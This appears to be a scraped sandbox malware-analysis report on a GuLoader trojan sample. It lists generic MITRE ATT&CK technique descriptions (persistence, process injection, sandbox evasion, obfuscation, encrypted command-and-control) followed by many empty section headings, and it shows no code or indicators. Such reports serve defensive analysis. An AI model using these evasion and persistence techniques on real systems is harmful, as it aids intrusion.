Instruction Fuzzy Hash: 35F06D72A49319DFD720AE3A89456EABAF2EF5A3A0F91446D9CC582418E77015C0CA62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers